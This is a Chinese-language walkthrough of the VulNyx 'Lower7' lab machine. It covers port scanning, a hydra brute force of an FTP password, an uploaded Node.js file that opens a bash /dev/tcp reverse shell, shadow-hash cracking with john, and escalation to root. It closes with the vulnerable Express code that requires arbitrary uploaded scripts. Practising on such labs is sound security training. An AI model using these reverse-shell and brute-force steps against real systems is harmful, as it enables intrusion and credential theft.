靶场练习-vulnyx：Lower7 - Low - VulNyx - 靶场练习 | 🎐清风. = 劈开深海，填入我的山🍂

# 靶场搭建

下载地址：Lower7

下载导入，NAT 模式，直接战斗

IP： 10.10.10.6

# 渗透过程

# 信息初收集

先扫一下端口看看

	┌──(root㉿kali)-[~]
	└─# nmap -p- -sS -T4 10.10.10.6 -v
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-21 21:15 EDT
	Initiating ARP Ping Scan at 21:15
	Scanning 10.10.10.6 [1 port]
	Completed ARP Ping Scan at 21:15, 0.08s elapsed (1 total hosts)
	Initiating Parallel DNS resolution of 1 host. at 21:15
	Completed Parallel DNS resolution of 1 host. at 21:15, 0.00s elapsed
	Initiating SYN Stealth Scan at 21:15
	Scanning 10.10.10.6 [65535 ports]
	Discovered open port 21/tcp on 10.10.10.6
	Discovered open port 3000/tcp on 10.10.10.6
	Completed SYN Stealth Scan at 21:15, 1.92s elapsed (65535 total ports)
	Nmap scan report for 10.10.10.6
	Host is up (0.00016s latency).
	Not shown: 65533 closed tcp ports (reset)
	PORT STATE SERVICE
	21/tcp open ftp
	3000/tcp open ppp
	MAC Address: 08:00:27:1D:A7:E0 (Oracle VirtualBox virtual NIC)

	Read data files from: /usr/bin/../share/nmap
	Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
	Raw packets sent: 65536 (2.884MB) \| Rcvd: 65536 (2.621MB)

两个端口开放，我们再进一步扫一下服务

	┌──(root㉿kali)-[~]
	└─# nmap -p- -sV -T4 10.10.10.6 -v
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-21 21:16 EDT
	NSE: Loaded 46 scripts for scanning.
	Initiating ARP Ping Scan at 21:16
	Scanning 10.10.10.6 [1 port]
	Completed ARP Ping Scan at 21:16, 0.11s elapsed (1 total hosts)
	Initiating Parallel DNS resolution of 1 host. at 21:16
	Completed Parallel DNS resolution of 1 host. at 21:16, 0.00s elapsed
	Initiating SYN Stealth Scan at 21:16
	Scanning 10.10.10.6 [65535 ports]
	Discovered open port 21/tcp on 10.10.10.6
	Discovered open port 3000/tcp on 10.10.10.6
	Completed SYN Stealth Scan at 21:16, 4.12s elapsed (65535 total ports)
	Initiating Service scan at 21:16
	Scanning 2 services on 10.10.10.6
	Completed Service scan at 21:17, 11.09s elapsed (2 services on 1 host)
	NSE: Script scanning 10.10.10.6.
	Initiating NSE at 21:17
	Completed NSE at 21:17, 0.03s elapsed
	Initiating NSE at 21:17
	Completed NSE at 21:17, 0.01s elapsed
	Nmap scan report for 10.10.10.6
	Host is up (0.00014s latency).
	Not shown: 65533 closed tcp ports (reset)
	PORT STATE SERVICE VERSION
	21/tcp open ftp vsftpd 2.0.8 or later
	3000/tcp open http Node.js (Express middleware)
	MAC Address: 08:00:27:1D:A7:E0 (Oracle VirtualBox virtual NIC)

	Read data files from: /usr/bin/../share/nmap
	Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 16.11 seconds
	Raw packets sent: 65541 (2.884MB) \| Rcvd: 65541 (2.622MB)

# 渗透

# FTP 服务

先连下 ftp 尝尝咸淡：

	┌──(root㉿kali)-[~]
	└─# ftp [email protected]
	Connected to 10.10.10.6.
	220 "Hello a.clark, Welcome to your FTP server."
	331 Please specify the password.
	Password:
	530 Login incorrect.
	ftp: Login failed

摸了个 123456，没登录进去。但是欢迎 banner 提示有一个用户叫 a.clark

接下来就是爆破

# 爆破 FTP

爆破 a.clark 用户的密码，拿到密码是 dragon

┌──(root㉿kali)-[~]
└─# hydra -t 64 -l a.clark -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.6  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-21 21:55:54
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://10.10.10.6:21/
[21][ftp] host: 10.10.10.6   login: a.clark   password: dragon
^C

# 反弹 shell

	┌──(root㉿kali)-[~]
	└─# cat shell.js
	const { exec } = require('child_process');

	module.exports = (req, res) => {
	exec('bash -i >& /dev/tcp/10.10.10.4/12138 0>&1', (error, stdout) => {
	res.send(`${stdout.trim()}`);
	});
	};

	┌──(root㉿kali)-[~]
	└─# ftp [email protected]
	Connected to 10.10.10.6.
	220 "Hello a.clark, Welcome to your FTP server."
	331 Please specify the password.
	Password:
	230 Login successful.
	Remote system type is UNIX.
	Using binary mode to transfer files.
	ftp> del shell.js
	250 Delete operation successful.
	ftp> put shell.js
	local: shell.js remote: shell.js
	229 Entering Extended Passive Mode (\|\|\|38942\|)
	150 Ok to send data.
	100% \|********************************************************\| 190 2.70 MiB/s 00:00 ETA
	226 Transfer complete.
	190 bytes sent in 00:00 (134.45 KiB/s)
	ftp> bye
	221 Goodbye.

	┌──(root㉿kali)-[~]
	└─# curl http://10.10.10.6:3000/shell.js

	┌──(root㉿kali)-[~]
	└─# nc -lnvp 12138
	listening on [any] 12138 ...
	connect to [10.10.10.4] from (UNKNOWN) [10.10.10.6] 46006
	whoami
	a.clark
	grep root /etc/shadow
	root:$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:20374:0:99999:7:::

# 爆破 passwd

	┌──(root㉿kali)-[~]
	└─# echo '$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD' > hash

	┌──(root㉿kali)-[~]
	└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt hash
	Using default input encoding: UTF-8
	Loaded 1 password hash (crypt, generic crypt(3) [?/64])
	Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
	Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
	Will run 4 OpenMP threads
	Press 'q' or Ctrl-C to abort, almost any other key for status
	bassman (?)
	1g 0:00:01:55 DONE (2025-10-21 22:11) 0.008662g/s 145.5p/s 145.5c/s 145.5C/s ice-cream..yenifer
	Use the "--show" option to display all of the cracked passwords reliably
	Session completed.

# 升级终端

	┌──(root㉿kali)-[~]
	└─# nc -lnvp 12138
	listening on [any] 12138 ...
	connect to [10.10.10.4] from (UNKNOWN) [10.10.10.6] 55678
	script /dev/null -c bash
	Script iniciado, el fichero de anotación de salida es '/dev/null'.
	a.clark@lower7:~$ ^Z
	zsh: suspended nc -lnvp 12138

	┌──(root㉿kali)-[~]
	└─# stty raw -echo;fg
	[1] + continued nc -lnvp 12138
	reset xterm

	a.clark@lower7:~$ export TERM=xterm-256color
	a.clark@lower7:~$ source .bashrc

# 升级 root

	a.clark@lower7:~$ su -
	Contraseña:
	root@lower7:~# id
	uid=0(root) gid=0(root) grupos=0(root)
	root@lower7:~# ls -al
	total 32
	drwx------ 5 root root 4096 oct 13 15:41 .
	drwxr-xr-x 18 root root 4096 oct 13 10:41 ..
	lrwxrwxrwx 1 root root 9 nov 15 2023 .bash_history -> /dev/null
	-rw-r--r-- 1 root root 3526 nov 15 2023 .bashrc
	drwxr-xr-x 3 root root 4096 nov 15 2023 .local
	drwxr-xr-x 4 root root 4096 oct 13 11:04 .npm
	-rw-r--r-- 1 root root 161 jul 9 2019 .profile
	-r-------- 1 root root 33 oct 13 15:16 root.txt
	drwx------ 2 root root 4096 oct 13 15:41 .ssh
	root@lower7:~# cat root.txt
	97b79229372dea359415afef3e350241

# 解析

3000 端口中 node 可执行 js 的原因是因为 /opt/site/index.js 中的内容

他在 page 中把 js 文件 require 进来了

	a.clark@lower7:/opt/site$ cat index.js
	const express = require('express');
	const fs = require('fs');
	const path = require('path');

	const app = express();
	const PORT = 3000;
	const PAGES_DIR = path.join(__dirname, 'pages');

	app.get('/', (req, res) => {
	res.send(`
	<html>
	<body>
	<h1>It works!</h1>
	<p>This is the default web page for this server.</p>
	<p>The web server software is running but no content has been added, yet.</p>
	</body>
	</html>
	`);
	});

	app.get('/:script', (req, res) => {
	const scriptName = req.params.script;
	const scriptPath = path.join(PAGES_DIR, scriptName);

	if (!scriptName.endsWith('.js') \|\| !fs.existsSync(scriptPath)) {
	res.status(404).send('File not found...');
	return;
	}

	try {
	delete require.cache[require.resolve(scriptPath)];
	const page = require(scriptPath);

	if (typeof page === 'function') {
	page(req, res);
	} else {
	res.status(500).send('The module does not export a function.');
	}
	} catch (err) {
	res.status(500).send('Error executing script.');
	}
	});

	app.listen(PORT, '0.0.0.0', () => {
	});

靶场 VulNyx